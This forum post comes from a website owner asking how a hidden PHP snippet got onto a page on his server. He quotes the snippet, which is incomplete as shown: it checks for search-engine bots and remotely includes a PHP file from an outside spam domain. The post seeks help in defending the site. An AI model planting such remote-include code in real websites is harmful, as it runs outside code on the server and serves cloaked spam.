What causes web attack to promote medicine-area.com ?

Do you have a question? Post it now! No Registration Necessary.  Now with pictures!

I found the following code snipped added to a page on a webserver:
<?  if ((eregi("bot", $_SERVER['HTTP_USER_AGENT']) or eregi("urp",
{@include("http://medicine-area.com/html.php ");} ?>

It looks as the purpose of this attack is to promote the website mentioned by
creating a link to it that is only visible to searchengine bots and crawlers.
I am very thankful for any help about what is causing this code to land on the
webserver. Both the web hoster and me checked the servers logfiles and checked
for rootkits, but could not find anything.

thanks, Mark

Site Timeline